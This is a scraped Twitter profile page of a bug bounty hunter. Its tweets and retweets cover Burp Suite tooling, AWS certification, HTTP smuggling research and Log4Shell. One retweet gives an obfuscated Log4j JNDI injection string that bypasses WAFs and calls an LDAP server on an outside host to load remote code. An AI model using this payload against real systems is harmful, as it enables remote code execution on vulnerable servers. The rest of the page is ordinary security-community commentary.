Nick || hunt4p1zza Profile
Nick || hunt4p1zza

@ngkogkos

Followers
3K
Following
3K
Media
89
Statuses
2K

I find bugs for ๐Ÿ•.

United Kingdom
Joined December 2011
Don't wanna be here? Send us removal request.
@ngkogkos
Nick || hunt4p1zza
5 years
I've been using AutoRepeater for years & I know from collabs/experience that not all are using it. I find it works magic in automating access control or other types of tests if you know how to configure it, so let's make an epic thread for AutoRepeater! #infosec #bugbounty [1]
20
147
382
@DionachCyber
Dionach
4 years
Join us for a live masterclass run by @CIISecHQ on July 20th at 16.30 BST. Presented by Technical Consultant, Flaviu Popescu, we'll look at cryptojacking and the risk it poses to organisations - including a live simulation. Sign up for the event here - https://t.co/ZjDQUVYVLh
0
4
2
@ngkogkos
Nick || hunt4p1zza
4 years
Hooray - just passed the #AWS SCS-C01 Security Specialty certification! Definitely a hard exam, but totally worth it as I've learnt a ton of AWS #infosec specifics which should help with security consulting for cloud solutions.
6
3
94
@HolyBugx
HolyBugx
4 years
The inconsistencies between reverse proxies and the back-end, always bring interesting attack vectors.
8
97
470
@EdOverflow
Ed
4 years
After 5 years of work, security.txt is officially an RFC. I am pleased to announce RFC 9116: https://t.co/uIqSRo28ak. I would like to use this opportunity to thank those who made this possible. Thank you. โค๏ธ
43
962
3K
@ngkogkos
Nick || hunt4p1zza
4 years
Ahead of the ISO 27001:2022 release, the ISO 27002:2022 update has recently been issued, outlining a restructure of the standard & several new controls. @DionachCyber has created a high-level overview of this to help orgs prepare for ISO 27001:2022.
0
0
2
@hacker_
Corben Leo
4 years
In 2010, WikiLeaks released a classified document. A list of infrastructure critical to U.S national security. The government listed a Trans-Atlantic cable. 3 years ago, 19-year-old me gained ADMIN access to that cable (and another; shared codebase). ๐ŸงตHere's how I found it
91
953
5K
@Yassineaboukir
Yassine Aboukir ๐Ÿ
4 years
.@thaivd98 and I got to escalate a limited SSRF (CVE-2019-8451) on a BBP to extract AWS security credentials on the new metadata endpoint (IMDSv2) which is designed to block SSRF by rejecting unauthenticated GET and requiring valid token to be passed in the header. It was fun!
6
15
143
@ngkogkos
Nick || hunt4p1zza
4 years
I am not trying to be picky, but I work a lot with my keyboard and if cursor focus is being lost, it means extra mouse moves and slower testing of payloads or removing stuff from wordlists in Intruder etc.
0
0
0
@ngkogkos
Nick || hunt4p1zza
4 years
Is it me or did BurpSuite start doing weird stuff to make me use the mouse constantly? Ex1: Sending repeater request moves the cursor to 1st byte of the raw req (top left). Ex2: Clicking "remote" in Intruder Payload Options takes the focus off from the dropdown list.
2
0
2
@mrd0x
mr.d0x
4 years
Here it is:
19
158
564
@thomasg_eth
thomasg.eth
4 years
For the past two weeks, I've been targeted in an extremely thorough social engineering scam that nearly cost me all of my ETH. I'm super lucky to have made it through unscathed. Here's the story ๐Ÿ‘‡
1K
7K
25K
@ngkogkos
Nick || hunt4p1zza
4 years
No doubt @_danielthatcher's HTTP Header smuggling research made it to top 10 for 2021. The article presents a simple yet powerful methodology to look for HTTP header parsing discrepancies leading to smuggling, bypasses etc.
@_danielthatcher
Daniel Thatcher
4 years
Look Mum! I'm on PortSwigger!
0
0
0
@nullenc0de
Paul Seekamp
4 years
Content Discovery and Param Miner in Burp found some hidden directory and parameter that was vulnerable to Log4j. The rest of the app was not vulnerable. CRAZY!๐Ÿ˜ฒ
3
11
81
@11xuxx
xxux11 แฏฒ ฬธ
4 years
So I share the last WAF bypass for log4j injection. WAF is OK but don't rely on them, they are fragile! Patch instead. ${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ฤฑ}:}}}ldap://mydogsbutt.com:1389/o} To bounty hunters: go go go! #bugbountytips
7
166
520
@levelsio
@levelsio
4 years
๐ŸŽ‰ I'm going to give one random person that retweets this $10,000. Because Iโ€™d rather spend my ad budget on you than BigTech ๐Ÿ‘ฉโ€๐Ÿ’ป I'm trying to promote my site Remote OK which helps you find a remote job so you don't need to go back to the office ๐Ÿ’– Thx! https://t.co/d5GwvsQDqc
Tweet card summary image
remoteok.com
Looking for a remote job? Remote OKยฎ is the #1 Remote Job Platform and has 1,129,781+ remote jobs as a Developer, Designer, Copywriter, Customer Support Rep, Sales Professional, Project Manager and...
294
7K
4K
@_r_netsec
/r/netsec
4 years
Log4shell - using the vulnerability to patch the vulnerability - very clever
Tweet card summary image
github.com
Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell - Cybereason/Logout4Shell
0
137
360
@cyb3rops
Florian Roth โšก๏ธ
4 years
What people seem to miss: The #Log4Shell vulnerability isn't just a RCE 0day. It's a vulnerability that causes hundreds and thousands of 0days in all kinds of software products. It's a 0day cluster bomb.
17
329
1K
@SecGus
chivato
4 years
Gonna start deliberately sending log4j payloads over HTTP to see what ISPs are logging
2
25
229
@ngkogkos
Nick || hunt4p1zza
4 years
Log4j is out, plenty of negativity around #BTC - best time for some drinks.
1
0
1